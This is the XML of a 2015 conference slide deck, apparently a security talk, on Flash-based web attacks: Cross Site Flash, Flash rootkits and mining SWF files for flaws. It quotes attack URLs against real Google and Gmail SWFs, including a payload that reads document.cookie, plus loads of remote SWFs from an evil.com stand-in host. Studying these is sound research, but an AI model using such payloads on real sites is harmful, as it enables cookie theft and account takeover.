          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4920120" y="3824280"/>
            <a:ext cx="4093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④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Flash Rootkit DEMO</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="218" name="内容占位符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3440" y="1824840"/>
            <a:ext cx="6476400" cy="407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Bypassing Some Restrictions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allowDomain('*.foo.com')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Bypass the XSS page under foo.com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MITM hijacking attacks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What if there is no interface addCallback for LSO writing？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See XSF skills in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>next section.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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>XSF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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Vulnerability Exploitation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XSF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XSF(Cross Site Flash) essence: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SWF file as input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http://foo.com/f.swf?swf=//evil.com/e.swf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http://evil.com/e.swf?swf=//foo.com/f.swf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AS2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loadMovie()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AS3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new Loader() + URLRequest(URLLoader)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Authority model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Authority Model</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="226" name="内容占位符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71840" y="1495440"/>
            <a:ext cx="5799240" cy="452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foo &amp; evil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foo &lt;- evil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Flash XSS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allowScriptAccess='sameDomain'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allowNetworking='internal'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allowFullScreen='false'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Can own the same authorities as foo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foo -&gt; evil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Even more interesting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foo -&gt; evil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3438000" y="1989000"/>
            <a:ext cx="2951640" cy="3239640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25560" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="C0504D"/>
            </a:solidFill>
            <a:custDash>
              <a:ds d="0" sp="0"/>
            </a:custDash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Foo Site SWF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7038360" y="3092760"/>
            <a:ext cx="1079280" cy="160776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Evil Site SWF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Loader</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4446000" y="2506680"/>
            <a:ext cx="1799640" cy="64728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allowDomain('*')</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4446000" y="3467160"/>
            <a:ext cx="1799640" cy="64728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public class</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4446000" y="4427280"/>
            <a:ext cx="1799640" cy="64728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steal data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025640" y="3092760"/>
            <a:ext cx="1763640" cy="1607760"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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Foo Site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crossdomain.xml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allow-access-from</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6461640" y="3467160"/>
            <a:ext cx="503280" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57240">
            <a:solidFill>
              <a:srgbClr val="BE4B48"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2860920" y="3467160"/>
            <a:ext cx="503280" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57240">
            <a:solidFill>
              <a:srgbClr val="BE4B48"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2861640" y="3895560"/>
            <a:ext cx="503280" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57240">
            <a:solidFill>
              <a:srgbClr val="BE4B48"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6451200" y="3895560"/>
            <a:ext cx="503280" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57240">
            <a:solidFill>
              <a:srgbClr val="BE4B48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foo -&gt; evil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457200" y="1340640"/>
            <a:ext cx="8228880" cy="413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Key points of this model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allowDomain('*')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Many public functions can be controlled directly after XSF. For example：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Related initialization functions need to run successfully, otherwise allowDomain may fail.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164520" y="2781000"/>
            <a:ext cx="8727120" cy="25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try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var domain:ApplicationDomain = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>loader.contentLoaderInfo.applicationDomain</a:t>
            </a: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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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dynamic access to definitions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var boxClass:Class = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>domain.getDefinition</a:t>
            </a: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("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>com.example.Box</a:t>
            </a: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") as Class;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var boxInstance:Object = new boxClass();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}catch(err:Error){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	trace(err.message);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foo -&gt; evil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Flash Rootkit’s alternative implant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When addCallback interface does not exist.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Flash Rootkit can also be  implanted through this method.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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Authority Model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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Key Points in Flash-Based Web Attacks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Special Authorization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sharedEvents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var shared:EventDispatcher = loader.contentLoaderInfo.sharedEvents;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postMessage mechanism similar to HTML5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Exposed events can be input.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XSF DEMO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Case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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Vulnerability Mining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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Manual 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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Vulnerability Mining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Key Points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Static debugging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Successful decompiling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Need to cope with various Flash format differences.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Dynamic debugging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Observe associated resource types with packet capture tools such as Fiddler.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crossdomain.xml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XML files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SWF files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Key Points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My Dictionary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899640" y="2312640"/>
            <a:ext cx="2890080" cy="3959280"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst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_root/_global/_level0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root.loaderInfo.parameters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LoadVars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Loader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loadBytes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URLLoader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URLRequest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XML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loadMovie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ExternalInterface</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4227840" y="2312640"/>
            <a:ext cx="2890080" cy="2591280"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst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allowDomain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allowInsecureDomain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SharedObject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getURL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navigateToURL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sharedEvents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Google SWF XML Hijacking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323640" y="1607760"/>
            <a:ext cx="8496360" cy="475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var myXML = new XML();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var __callResult_162 = myXML.load(( ( "http://" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>_root.host </a:t>
            </a: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) + "/load.php?action=playerad" ));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myXML.ignoreWhite = True;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myXML.onLoad = function (success)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  type = myXML.childNodes.0.childNodes.0.childNodes.0.nodeValue;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  adurl = myXML.childNodes.0.childNodes.1.childNodes.0.nodeValue;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  _global.sec =  Number(myXML.childNodes.0.childNodes.2.childNodes.0. nodeValue) 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  std = myXML.childNodes.0.childNodes.3.childNodes.0.nodeValue;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  if ( ( std == 1 ) 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      if ( ( type == 1 ) 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          mp1.contentPath = ( ( ( "http://" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>_root.host </a:t>
            </a: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) + "/" ) + adurl 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          var __callResult_267 = mp1.play();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XML Hijacking： http://www.google.com/ads/videopbox.swf?home_host_port=evil.com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Google SWF XSS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filetype:swf site:google.com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http://www.google.com/enterprise/mini/control.swf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1046160" y="3213000"/>
            <a:ext cx="5447520" cy="912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if ( !(__callResult_6871 ) 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  var __callResult_6880 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>getURL</a:t>
            </a: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(_level0.onend, "");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Gmail SWF XSS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https://mail.google.com/mail/uploader/uploaderapi2.swf?apiInit=eval&amp;apiId=alert(document.cookie)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="3425040"/>
            <a:ext cx="8784360" cy="25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var flashParams:* = LoaderInfo(this.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>root.loaderInfo</a:t>
            </a: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).parameters;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API_ID = "apiId" in flashParams ? (String(flashParams.apiId)) : ("");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API_INIT = "apiInit" in flashParams ? (String(flashParams.apiInit)) : ("onUploaderApiReady");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if (ExternalInterface.available)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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>ExternalInterface.call</a:t>
            </a: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(API_INIT, API_ID);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Sina Flash Rootkit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92520" y="1484640"/>
            <a:ext cx="8625240" cy="2834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// ActionScript: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00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>Security.allowDomain("*");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ExternalInterface.addCallback("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>getLazyInterface</a:t>
            </a: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",cInter.getLazyInterface);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ExternalInterface.addCallback("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>setLazyInterface</a:t>
            </a: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",cInter.setLazyInterface);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var _so:SharedObject = SharedObject.getLocal(SINA_CHANNEL,"/");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270360" y="4293000"/>
            <a:ext cx="5601960" cy="1187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  <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>// JavaScript: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  <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>Lib.LocalDB.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>("SUKeya", 123456)) {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  <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>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Sandbox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Local Sandbox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Security.LOCAL_WITH_FILE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Security.LOCAL_WITH_NETWORK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Security.LOCAL_TRUSTED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...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Remote Sandbox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Security.REMOTE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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>crossdomain.xml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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Security.allowDomain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Baidu XSF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147600" y="1268640"/>
            <a:ext cx="7666560" cy="5273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public function FlashPlayer() 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    super();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    try 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00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>        Security.allowDomain("*");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public function f_load(param1:String) : void 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    var u:String = param1;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    var urlRequest:URLRequest = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>URLRequest</a:t>
            </a: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(u);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    try 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        player.load(urlRequest);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        player.addEventListener(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>Event.COMPLETE,completeListener</a:t>
            </a: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00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>public</a:t>
            </a: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 function getLoadedByte() : int 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    return loadedByte;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  <a:ea typeface="宋体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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Half-Automatic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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Vulnerability Mining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Architecture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1115640" y="2061000"/>
            <a:ext cx="1391760" cy="64728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Browser</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2699640" y="2389680"/>
            <a:ext cx="359280" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57240">
            <a:solidFill>
              <a:srgbClr val="BE4B48"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3275280" y="2063880"/>
            <a:ext cx="1223280" cy="64728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Browser Proxy Extensions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5220000" y="2063880"/>
            <a:ext cx="2807640" cy="64728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mitmdump -s 'dumpurls.py'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6599160" y="3317040"/>
            <a:ext cx="1367280" cy="64728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swf urls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716000" y="3317040"/>
            <a:ext cx="1367280" cy="64728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swf files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2803680" y="3317040"/>
            <a:ext cx="1367280" cy="64728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ActionScript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Codz</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716000" y="2393640"/>
            <a:ext cx="359280" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57240">
            <a:solidFill>
              <a:srgbClr val="BE4B48"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7283520" y="2821680"/>
            <a:ext cx="360" cy="442800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57240">
            <a:solidFill>
              <a:srgbClr val="BE4B48"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6166440" y="3641040"/>
            <a:ext cx="348120" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57240">
            <a:solidFill>
              <a:srgbClr val="BE4B48"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2327760" y="3641040"/>
            <a:ext cx="359280" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57240">
            <a:solidFill>
              <a:srgbClr val="BE4B48"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115640" y="3315600"/>
            <a:ext cx="1143000" cy="1459800"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst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My Dictionary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="CustomShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4283280" y="3641040"/>
            <a:ext cx="348120" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57240">
            <a:solidFill>
              <a:srgbClr val="BE4B48"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="CustomShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2803680" y="4570200"/>
            <a:ext cx="1367280" cy="64728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Human Judgment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="CustomShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3471840" y="4046040"/>
            <a:ext cx="360" cy="442800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57240">
            <a:solidFill>
              <a:srgbClr val="BE4B48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Advantage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Focus on vulnerability mining itself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Summary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457200" y="1417680"/>
            <a:ext cx="8228880" cy="470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Flash-based Web attack is a classical branch with many features.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Although following the browser-origin policy, unique authority model may lead to unexpected security risks.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Developers generally lack of the awareness of Flash Secure Coding.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Flash scripting language includes AS2 and AS3.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Flash files have a greater chance of being decompiled.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Flash ecosystem is large and chaotic, with potentially deadly risks.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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Q&amp;A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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Tribute To Flash...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DOM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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>DOM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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>object/embed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allowNetworking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all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internal(default)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none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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>allowScriptAccess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never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sameDomain(default)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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>always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Security Domain</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="128" name="内容占位符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1600" y="2383200"/>
            <a:ext cx="4419720" cy="295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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Application Domain</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130" name="内容占位符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640" y="1865880"/>
            <a:ext cx="4419720" cy="2959200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="131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96000" y="1484640"/>
            <a:ext cx="2450880" cy="372132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594000" y="5661360"/>
            <a:ext cx="69534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宋体"/>
              </a:rPr>
              <a:t>More: http://www.senocular.com/flash/tutorials/contentdomains/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1561</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>456</Paragraphs>
  <Slides>65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65</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="75" baseType="lpstr">
      <vt:lpstr>DejaVu Sans</vt:lpstr>
      <vt:lpstr>StarSymbol</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman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Cos</dc:creator>
  <cp:lastModifiedBy>mc hi</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-08-18T14:27:22Z</dcterms:modified>
</cp:coreProperties>
</file>